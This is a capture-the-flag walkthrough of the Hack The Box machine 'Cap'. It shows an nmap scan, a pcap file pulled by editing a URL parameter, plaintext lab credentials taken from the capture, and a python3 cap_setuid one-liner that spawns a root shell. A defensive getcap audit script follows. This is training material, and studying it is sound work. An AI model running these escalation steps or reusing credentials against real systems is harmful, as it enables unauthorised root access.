HTB Walkthrough : Cap

Today we take on another Hack The Box challenge, Cap. This is an easy-level machine where unencrypted traffic was captured, and we analyze that traffic with Wireshark. Without wasting time, let's start the machine.

Level : Easy

Attacking Strategy

  • Network Scanning
    • Nmap
  • Enumeration
    • PCAP dump
    • Analyze pcap file
    • Extract credentials from pcap file
  • Privilege Escalation
    • Abusing capabilities


IP Address :

We start with an nmap scan using the default scripts (-sC) and version detection (-sV) to grab the service banners. Nmap shows that several ports are open on the target: port 21 (FTP), port 22 (SSH) and port 80 (HTTP).

nmap -sC -sV -p-
Nmap scan report for
Host is up (0.11s latency).
Not shown: 65463 filtered ports, 69 closed ports
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Fri, 20 Aug 2021 16:22:54 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 20 Aug 2021 16:22:48 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 20 Aug 2021 16:22:48 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, GET, HEAD
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
|     </body>
|_    </html>
|_http-server-header: gunicorn

On port 21 (FTP), anonymous login is not available and this version is not directly exploitable, so we move on to port 80 and start enumerating. After some time we find information in the profile, such as the username “Nathan”.


The landing page has one more function: taking a snapshot for analysis. We download some pcap files and go through them, looking for services or any other details. After some time we simply try to get the 0.pcap file by changing the URL parameter.

The 0.pcap file contains many protocols, such as HTTP. The capture is too long to read in full, so we filter it down to what we need. After some time we find the credentials, so we simply try them over SSH, and it works.

Privilege Escalation

With these credentials we SSH to the server. Now it's time to get root, so we start with manual enumeration, such as checking the passwd file, the SUID bit, etc.

Username : nathan

Password : Buck3tH4TF0RM3!

Username and Password from PCAP file

After some time we find that we can abuse capabilities, in this case by using python; GTFOBins shows how to abuse capabilities. After successful exploitation we get root and collect the flags.

getcap -r / 2>/dev/null
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
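
From the defender's side, the same getcap listing is the audit for this finding. The script below is an added example, not part of the original walkthrough: it parses `getcap -r /` output in both libcap formats and flags binaries, interpreters above all, that hold capabilities such as cap_setuid in their permitted set. The capability list, the interpreter list and the sample listing are assumptions made for the example.

```python
import re

# Capabilities that let a process change identity or bypass file permissions.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
             "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown"}
# Binaries that execute arbitrary user-supplied code (assumed list; extend locally).
INTERPRETERS = re.compile(r"/(python[\d.]*|perl[\d.]*|ruby[\d.]*|node|php[\d.]*|gdb)$")
# getcap prints "path = caps+flags" (older libcap) or "path caps=flags" (newer).
LINE = re.compile(r"^(?P<path>/.+?)(?: =)? (?P<spec>cap_\S.*)$")
CLAUSE = re.compile(r"^(?P<names>[a-z0-9_,]+)(?P<flags>[=+-][eip=+-]*)$")


def audit(getcap_output):
    """Return [(path, risky_caps, severity)] for a `getcap -r /` listing."""
    findings = []
    for line in getcap_output.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        risky = set()
        for clause in m["spec"].split():
            c = CLAUSE.match(clause)
            # A file capability is only gained on exec by an ordinary user when
            # it is in the permitted set ('p'); inheritable-only entries are skipped.
            if c and "p" in c["flags"]:
                risky |= DANGEROUS & set(c["names"].split(","))
        if risky:
            severity = "critical" if INTERPRETERS.search(m["path"]) else "review"
            findings.append((m["path"], sorted(risky), severity))
    return findings


# Constructed sample listing (not output captured from the box), mixing both formats.
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/perl cap_setuid=ep
/usr/local/bin/backup cap_dac_read_search=ep
/opt/tool cap_setuid=i
"""

if __name__ == "__main__":
    for path, caps, severity in audit(SAMPLE):
        # Remediation for a confirmed finding: setcap -r <path>
        print(f"[{severity}] {path}: {','.join(caps)}")
```

An interpreter with cap_setuid in its permitted set is equivalent to a SUID-root shell, which is why those entries are rated critical rather than left for review.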
